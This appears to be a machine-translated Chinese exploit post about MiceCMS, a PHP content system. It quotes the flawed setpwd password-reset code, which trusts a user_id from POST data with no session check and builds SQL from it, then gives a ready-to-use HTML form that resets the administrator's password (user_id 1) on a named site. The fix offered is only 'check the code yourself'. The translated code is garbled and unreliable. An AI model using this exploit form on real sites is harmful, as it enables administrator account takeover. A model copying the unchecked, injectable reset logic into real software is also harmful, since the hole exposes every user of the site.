Micecms one chicken rib vulnerability and repair attachment EXP

This vulnerability does not mean that the administrator password needs to be changed. After you enter the background, the real administrator cannot enter the new password.

Read the code in the classic dialogue !..........
IndexsetpwdAction. php
The running path is http://www.bkjia.com/index.php/setpwd. It looks a little strange.

<? Php
Class setpwdAction extends security_normal {

Function action (){
$ Loginname = $ this-> _ getParamId (1 );
$ Forgetpwd = $ this-> _ getParamId (2 );

Global $ conn;
If ($ _ POST [user_id]) {//-0 -! Instead of obtaining the Session, we define the vulnerability.
$ User = new model_User (); // connect to the database
$ User-> setSubsection (WHERE user_id =. $ _ POST [user_id]); // query the member ID. Note that the default administrator ID is 1 if the ID is not the name.
$ Results = $ user-> doSelectOne ();

$ Password1 = $ _ POST [pwd1]; // Password
$ Password2 = $ _ POST [pwd2]; // confirm the password
$ Pwd =;
If ($ password1 ==$ password2 and strlen ($ password1)> 4)
{
$ Salt = md5 (rand (100000,999 999). $ _ POST [loginname]);
// This value is used as a good multi-encryption password and is written in the USER table.
$ Pwd = sha1 ($ salt. $ password1 );
// Do not parse... Encryption

}

If ($ results) // does not parse
{
If (strlen ($ pwd)> 0) {// no reason why do you want to leave the password empty?
$ User-> setSalt ($ salt );
$ User-> setPassword ($ pwd );
}
$ User-> setForgetpwd ();
$ Results = $ user-> doUpdate ();
// Written...
If ($ results)
$ Exeresult = the password is successfully modified. Use the new password to log on to the website;
Else
$ Exeresult = verification error. Contact the website administrator !;
// The following code can be ignored

After the analysis, the admin and members are placed in the USER table.
Background login address http://www.bkjia.com/admin.php/login

EXP:
<Form method = "post" action = "http://www.bkjia.com/index.php/setpwd" enctype = "multipart/form-data" id = "upload">
<Label>
<Input name = "user_id" type = "text" value = "1"/>
</Label>
<Label>
<Input name = "pwd1" type = "text" value = "write by yourself"/>
</Label>
<Label>
<Input name = "pwd2" type = "text" value = "write by yourself"/>
</Label>
<Label>
<Input name = "loginname" type = "text" value = "admin"/>
</Label>
<Div> </div>
<Input name = "respondids" value = "confirm to modify" class = "coolbg np" type = "submit">
</Form>

 

Edited by: Mind and emotion

Fixed: Check the code and change it by yourself.